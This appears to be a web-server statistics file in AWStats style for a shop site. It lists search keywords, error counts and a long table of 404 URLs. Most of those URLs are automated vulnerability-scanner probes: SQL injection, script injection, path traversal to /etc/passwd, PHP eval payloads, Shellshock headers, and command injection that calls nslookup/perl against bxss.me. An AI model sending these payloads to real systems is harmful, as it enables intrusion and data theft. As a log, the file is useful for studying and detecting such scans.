testing9206755 1
testing9734595 1
testing9255881 1
testing9391804 1
testing9756842 1
testing9860865 1
testing9552416 1
testing9048160 1
testing9566396 1
testing9734867 1
testing9491894 1
testing9961823 1
testing9413648 1
testing9178616 1
testing9426019 1
testing9172333 1
testing9180521 1
testing9249319 1
testing9371536 1
testing9333345 1
testing9824238 1
testing9900368 1
testing9762569 1
testing9832746 1
testing9384081 1
END_SEARCHWORDS
# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 41
testing 8322
98 81
||chr 54
chr 27
//bxss.me/rpb.png\ 27
15 27
\ 27
src=\ 27
include 27
|| 27
testing<esi 27
/> 27
||dbms_pipe.receive_message 27
http 27
testing9734595 1
testing9547952 1
testing9206755 1
testing9391804 1
testing9255881 1
testing9756842 1
testing9900368 1
testing9824238 1
testing9333345 1
testing9880104 1
testing9384081 1
testing9762569 1
testing9832746 1
testing9371536 1
testing9180521 1
testing9172333 1
testing9249319 1
testing9491894 1
testing9048160 1
testing9566396 1
testing9734867 1
testing9552416 1
testing9860865 1
testing9426019 1
testing9178616 1
testing9961823 1
testing9413648 1
END_KEYWORDS
# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
404 7926 20852
508 386 111168
401 220 9635
301 24 6060
302 11312 223
END_ERRORS
# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 6242
/acc'%20AND%202*3*8=6*8%20AND%20'Krb6'='Krb6/skin/install/default/ 1 https://104.36.149.61/
/acc9277724/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js/varien'\"()&%25<acx><ScRiPt%20>Rirk(9053)<%2fScRiPt>/js.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>JN5X(9290)<%2fScRiPt>/windows/ 1 https://104.36.149.61/
/acc/index.php//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 2 -
/acc/skin/%3b(nslookup%20hitlwwdxjzxga67382.bxss.me||perl%20-e%20\"gethostbyname('hitlwwdxjzxga67382.bxss.me')\")|(nslookup%20hitlwwdxjzxga67382.bxss.me||perl%20-e%20\"gethostbyname('hitlwwdxjzxga67382.bxss.me')\")&(nslookup%20hitlwwdxjzxga67382.bxss.me||p 1 -
/acc/index.php/install/../../../Gemfile 1 -
/+CSCOT+/oem-customization 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/grid.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/extended_debug.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/giftoptions/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/mage/adminhtml/events.js 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/backup.js 1 https://104.36.149.61/
/jscripts/tiny_mce 1 -
//js/prototype/validation.js 1 https://104.36.149.61/
/acc/..%2fjs/prototype/prototype.js 1 https://104.36.149.61/
//..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd 1 -
/104.sql 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/accordion.js 1 -
/acc/skin/install/default/.%2fdefault/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hithnoguyideob3aac.bxss.me||perl%20-e%20\"gethostbyname('hithnoguyideob3aac.bxss.me')\")|(nslookup%20hithnoguyideob3aac.bxss.me||perl%20-e%20\"gethostbyname('hithnoguyideob3aac.bxss.me')\")&(nslookup%20hithnoguyideob3aac.bxss.me||perl%2 1 -
/@@1jrw6/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/image.js 1 https://104.36.149.61/
/(nslookup%20hitwlufcwgapcabb54.bxss.me||perl%20-e%20\"gethostbyname('hitwlufcwgapcabb54.bxss.me')\")/js/mage/translate.js 1 -
//js/prototype/prototype.js 1 https://104.36.149.61/
/response.write(9293666*9931356)/js/prototype/windows/themes/ 1 -
/.%2facc/skin/adminhtml/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/authenticationendpoint/testtest.jsp 1 -
/acc/js/%3b(nslookup%20hitniqgfydfky5ba2a.bxss.me||perl%20-e%20\"gethostbyname('hitniqgfydfky5ba2a.bxss.me')\")|(nslookup%20hitniqgfydfky5ba2a.bxss.me||perl%20-e%20\"gethostbyname('hitniqgfydfky5ba2a.bxss.me')\")&(nslookup%20hitniqgfydfky5ba2a.bxss.me||per 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>gJZT(9379)<%2fScRiPt>/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/prototype/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/skin/install/default/..%2fdefault/css/reset.css 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/image.js 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"sJxO\"=\"sJxO/js/prototype/ 1 https://104.36.149.61/
/Ai4DOCeh'%20OR%20158=(SELECT%20158%20FROM%20PG_SLEEP(15))--/js/prototype/validation.js 1 https://104.36.149.61/
/qigjSv0u'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/backup.js/911936%40 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/grid.js 1 -
/@@iSgBK/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/&echo%20zsgpxl$()\\%20azkmpz\\nz^xyu||a%20%23'%20&echo%20zsgpxl$()\\%20azkmpz\\nz^xyu||a%20%23|\"%20&echo%20zsgpxl$()\\%20azkmpz\\nz^xyu||a%20%23/js/mage/adminhtml/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/default/ 1 https://104.36.149.61/
/..%2f..%2fGemfile 1 -
/docs/../../../../../../../../../../../../../etc/shells 1 -
/acc/index.php/install/wizard//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/.%2fjs/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/echo%20vcygxf$()\\%20wyqyvh\\nz^xyu||a%20%23'%20&echo%20vcygxf$()\\%20wyqyvh\\nz^xyu||a%20%23|\"%20&echo%20vcygxf$()\\%20wyqyvh\\nz^xyu||a%20%23/skin/adminhtml/ 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype.js 1 https://104.36.149.61/
/admin/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/product/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/ 1 https://104.36.149.61/
/.travis.yml 1 -
/acc/skin/install'\"()&%25<acx><ScRiPt%20>Ijhk(9123)<%2fScRiPt>/default/default/css/boxes.css 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(110).concat(76).concat(110).concat(84)+(require'socket'%0aSocket.gethostbyname('hitmb'+'gpzxtzbg02acd.bxss.me.')[3].to_s)+'/js/prototype/windows/themes/ 1 -
/'\"/js/mage/adminhtml/giftoptions/ 1 -
/acc/.%2fjs/mage/adminhtml/hash.js 1 https://104.36.149.61/
/'+response.write(9954991*9023959)+'/js/mage/adminhtml/sales/ 1 -
/'+response.write(9347243*9984767)+'/js/prototype/extended_debug.js 1 -
/${@print(md5(31337))}/js/mage/adminhtml/hash.js 1 -
/adminer-4.4.0-mysql-en.php 1 https://104.36.149.61/
/acc/skin/install/default/default/1%00%c0%a7%c0%a2%252527%252522/iestyles.css 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/uploader/ 1 -
/acc/js/varien/./WEB-INF/web.xml%00.jsp 2 -
/'\"/js/mage/adminhtml/uploader/ 1 -
/12345'\"\\'\\\") 43 https://104.36.149.61/
/acc/js/mage/./WEB-INF/web.xml%00.jsp 2 -
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/css/reset.css 1 https://104.36.149.61/
/${9999241+10000119}/skin/install/default/default/css/iestyles.css 1 -
/acc/%3b(nslookup%20hitimehjyafze876a7.bxss.me||perl%20-e%20\"gethostbyname('hitimehjyafze876a7.bxss.me')\")|(nslookup%20hitimehjyafze876a7.bxss.me||perl%20-e%20\"gethostbyname('hitimehjyafze876a7.bxss.me')\")&(nslookup%20hitimehjyafze876a7.bxss.me||perl%2 1 -
/'\"/skin/install/default/ 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/A8Ck4eEV')%20OR%20426=(SELECT%20426%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/browser.js 1 -
/Z8Uu1HU1/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/(nslookup%20hithajhvtxgbt4f858.bxss.me||perl%20-e%20\"gethostbyname('hithajhvtxgbt4f858.bxss.me')\")/js/mage/ 1 -
/acc/skin/install/default/default/..%2fcss/ie7minus.css 1 https://104.36.149.61/
/application/configs/application.ini 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"nMek\"=\"nMek/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/%3b(nslookup%20hitmjduyhadeh88709.bxss.me||perl%20-e%20\"gethostbyname('hitmjduyhadeh88709.bxss.me')\")|(nslookup%20hitmjduyhadeh88709.bxss.me||perl%20-e%20\"gethostbyname('hitmjduyhadeh88709.bxss.me')\")&(nslookup%20hitmjduyhadeh88709.bxss.me||perl%20-e% 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(100).concat(81).concat(111).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitoq\"+\"xvieikmsabf08.bxss.me.\")[3].to_s)+\"/js/mage/ 1 -
/acc'||'/js/mage/ 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'EbMh'='EbMh/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passw 1 -
/acc/js/..%2fmage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/|(nslookup%20hitkowryhmopy3d0d9.bxss.me||perl%20-e%20\"gethostbyname('hitkowryhmopy3d0d9.bxss.me')\")/skin/adminhtml/ 1 -
/acc/index.php/install/../../../../package.json 1 -
/acc/index.php/install/wizard/12345'\"\\'\\\") 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/skin/.%2finstall/default/default/ 1 https://104.36.149.61/
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/prototype/..%2fprototype.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/skin/install/default/ 1 -
/echo%20ultqak$()\\%20ugjcci\\nz^xyu||a%20%23'%20&echo%20ultqak$()\\%20ugjcci\\nz^xyu||a%20%23|\"%20&echo%20ultqak$()\\%20ugjcci\\nz^xyu||a%20%23/index.php/install/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/index.php/install/wizard/config/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitjx'.'tshusurufa616.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(85).chr(113).chr(81).'/js/mage/adminhtml/flexuploader.js 1 -
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/default/css/reset.css 1 https://104.36.149.61/
/104.zip 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/validation.js 1 -
/104.36.149.61_db.sql 1 -
/-1%20OR%202+411-411-1=0+0+0+1/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/cgi-bin/guestbook.cgi 1 ()%20{%20Referer
/'+response.write(9393742*9068100)+'/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/..%2fmage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/form.js 1 https://104.36.149.61/
/w3d0XbRC 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/hash.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/validation.js 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2fpackage-lock.json 1 -
/acc'\"()&%25<acx><ScRiPt%20>XkUp(9191)<%2fScRiPt>/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/&echo%20hybefq$()\\%20injqgz\\nz^xyu||a%20%23'%20&echo%20hybefq$()\\%20injqgz\\nz^xyu||a%20%23|\"%20&echo%20hybefq$()\\%20injqgz\\nz^xyu||a%20%23/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/flexuploader.js 1 -
///..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\etc/passwd 1 -
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/windows/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/windows/ 1 https://104.36.149.61/
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/css/reset.css 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/application/libraries/ofc-library/ofc_upload_image.php 1 -
/acc/index.php/install/wizard/locale//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'bSxm'!='bSxm%25/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/(nslookup%20hitpgfcnrjnff2d8ea.bxss.me||perl%20-e%20\"gethostbyname('hitpgfcnrjnff2d8ea.bxss.me')\")/index.php/install/wizard/config/ 1 -
/resources/fckeditor 2 -
/)/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/index.php/install/../../../../../package.json 1 -
/acc/index.php//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
//js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../windows/win.ini 2 -
/acc9290426/js/mage/adminhtml/ 1 https://104.36.149.61/
/bitbucket-pipelines.yml 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'Udsx'='Udsx/js/prototype/tooltip.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/prototype/windows/MIT-LICENSE/966289%40 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../windows/win.ini%00 1 -
/echo%20afdlcu$()\\%20raqdla\\nz^xyu||a%20%23'%20&echo%20afdlcu$()\\%20raqdla\\nz^xyu||a%20%23|\"%20&echo%20afdlcu$()\\%20raqdla\\nz^xyu||a%20%23/js/scriptaculous/effects.js 1 -
/acc/index.php/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/config/ 1 https://104.36.149.61/
/..%2facc/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/scriptaculous/effects.js/957183%40 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/css/reset.css 1 -
/..%2facc/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install//../../../WEB-INF/web.xml%00.jsp 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2fdefault/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install/'\"()&%25<acx><ScRiPt%20>6DR8(9557)<%2fScRiPt>/locale/ 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>2DaK(9603)<%2fScRiPt>/mage/ 1 https://104.36.149.61/
/-1%20OR%203+451-451-1=0+0+0+1/js/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/..%2f..%2f..%2fpackage-lock.json 1 -
/acc/js/mage/adminhtml/.%2faccordion.js 1 https://104.36.149.61/
/acc/skin/install/default/default/images/./WEB-INF/web.xml%00.jsp 2 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/ 1 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 60 -
/)/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/../../../../../web.config 1 -
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/skin/adminhtml/%3b(nslookup%20hitulkopmtswjfdc21.bxss.me||perl%20-e%20\"gethostbyname('hitulkopmtswjfdc21.bxss.me')\")|(nslookup%20hitulkopmtswjfdc21.bxss.me||perl%20-e%20\"gethostbyname('hitulkopmtswjfdc21.bxss.me')\")&(nslookup%20hitulkopmtswjfdc21. 1 -
/history/historyFrame.html 1 -
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/css/iestyles.css 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/wysiwyg/ 1 -
/cgi-bin/php 1 -
/..%2facc/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(75).concat(114).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitya\"+\"busxclicd084b.bxss.me.\")[3].to_s)+\"/skin/frontend/ 1 -
/${@print(md5(31337))}/js/prototype/debug.js 1 -
/|echo%20tuxxjr$()\\%20snofdt\\nz^xyu||a%20%23'%20|echo%20tuxxjr$()\\%20snofdt\\nz^xyu||a%20%23|\"%20|echo%20tuxxjr$()\\%20snofdt\\nz^xyu||a%20%23/js/prototype/extended_debug.js 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/G0SKrr1QUP.cfm 1 -
/$(nslookup%20hitpujybuzxfd565d1.bxss.me||perl%20-e%20\"gethostbyname('hitpujybuzxfd565d1.bxss.me')\")/index.php/install/wizard/config/ 1 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/extended_debug.js 1 -
/..%2facc/js/prototype/validation.js 1 https://104.36.149.61/
//.../.../.../.../.../.../.../.../etc/passwd 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/varien/js.js 1 https://104.36.149.61/
/acc/js/prototype/windows/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/hash.js 1 https://104.36.149.61/
/acc/index.php/install/../../../../../web.config 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(121).concat(80).concat(116).concat(89)+(require\"socket\"%0aSocket.gethostbyname(\"hitjy\"+\"rzwukbik35d21.bxss.me.\")[3].to_s)+\"/index.php/install/wizard/locale/ 1 -
/WEB-INF/jboss-web.xml%20(copy) 1 -
/acc/index.php/install/wizard///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/${@print(md5(31337))}\\/js/prototype/windows/ 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/wysiwyg/ 1 https://104.36.149.61/
/lc/system/console 1 -
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/css/boxes.css 1 -
/\"+response.write(9567693*9061005)+\"/skin/install/default/default/css/clears.css 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/wysiwyg/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/prototype.js 1 https://104.36.149.61/
/..%2facc/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>ZcmW(9610)<%2fScRiPt>/grid.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/ 1 https://104.36.149.61/
/&(nslookup%20hitdgnrvicvka45fbf.bxss.me||perl%20-e%20\"gethostbyname('hitdgnrvicvka45fbf.bxss.me')\")&'\\\"`0&(nslookup%20hitdgnrvicvka45fbf.bxss.me||perl%20-e%20\"gethostbyname('hitdgnrvicvka45fbf.bxss.me')\")&`'/js/mage/adminhtml/wysiwyg/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/tooltip.js 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2fweb.config 1 -
/'+response.write(9274962*9075082)+'/skin/install/default/default/ 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/browser.js 1 -
/acc/index.php/..%2f..%2f..%2f..%2fGemfile 1 -
/db.tar 1 -
/acc/skin/install/default/default/css/1%00%c0%a7%c0%a2%252527%252522.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/extended_debug.js 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'p4YJ'='p4YJ/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/admin/scripts/fckeditor 2 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/varien/form.js 1 https://104.36.149.61/
/admin/ckeditor 1 -
/^(%23$!@%23$)(()))******/skin/install/default/default/ 1 https://104.36.149.61/
/104.36.149.61_db.sql.gz 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/uploader/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>sGFI(9471)<%2fScRiPt>/prototype/tooltip.js 1 https://104.36.149.61/
/${9999051+9999808}/skin/install/default/default/css/clears.css 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/ 1 -
/&(nslookup%20hitntamuazmar17d85.bxss.me||perl%20-e%20\"gethostbyname('hitntamuazmar17d85.bxss.me')\")&'\\\"`0&(nslookup%20hitntamuazmar17d85.bxss.me||perl%20-e%20\"gethostbyname('hitntamuazmar17d85.bxss.me')\")&`'/skin/install/default/ 1 -
/echo%20zayrkt$()\\%20nkwlhf\\nz^xyu||a%20%23'%20&echo%20zayrkt$()\\%20nkwlhf\\nz^xyu||a%20%23|\"%20&echo%20zayrkt$()\\%20nkwlhf\\nz^xyu||a%20%23/js/mage/adminhtml/giftmessage.js 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/css/iestyles.css 1 https://104.36.149.61/
/acc/.%2fskin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/Guardfile 1 -
/uq4XJuyx'%20OR%20311=(SELECT%20311%20FROM%20PG_SLEEP(15))--/js/prototype/windows/themes/ 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/prototype/validation.js 1 https://104.36.149.61/
/\"+response.write(9177626*9035729)+\"/js/mage/adminhtml/hash.js 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitpvvkatwgjr0cbdf.bxss.me||perl%20-e%20\"gethostbyname('hitpvvkatwgjr0cbdf.bxss.me')\")|(nslookup%20hitpvvkatwgjr0cbdf.bxss.me||perl%20-e%20\"gethostbyname('hitpvvkatwgjr0cbdf.bxss.me')\")&(nslookup%20hitpvvkatwgjr0cbdf.bxss.me||perl%2 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/cgi-bin-sdb/printenv 1 ()%20{%20Referer
/acc'||'/skin/install/default/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/wysiwyg/ 1 -
/\"+response.write(9043238*9519677)+\"/skin/install/default/default/css/reset.css 1 -
/blog/fckeditor 2 -
/acc/js/mage/adminhtml/product.js/926704%40 1 https://104.36.149.61/
/&(nslookup%20hituwypmnejxv34cca.bxss.me||perl%20-e%20\"gethostbyname('hituwypmnejxv34cca.bxss.me')\")&'\\\"`0&(nslookup%20hituwypmnejxv34cca.bxss.me||perl%20-e%20\"gethostbyname('hituwypmnejxv34cca.bxss.me')\")&`'/js/mage/adminhtml/giftmessage.js 1 -
/%2fxfs.bxss.me/js/varien/form.js 1 -
/acc/%2fxfs.bxss.me/adminhtml/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitrlopjfwzxa6fb8c.bxss.me||perl%20-e%20\"gethostbyname('hitrlopjfwzxa6fb8c.bxss.me')\")|(nslookup%20hitrlopjfwzxa6fb8c.bxss.me||perl%20-e%20\"gethostbyname('hitrlopjfwzxa6fb8c.bxss.me')\")&(nslookup%20hitrlopjfwzxa6fb8c.bxss.me||per 1 -
/acc/js/prototype/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
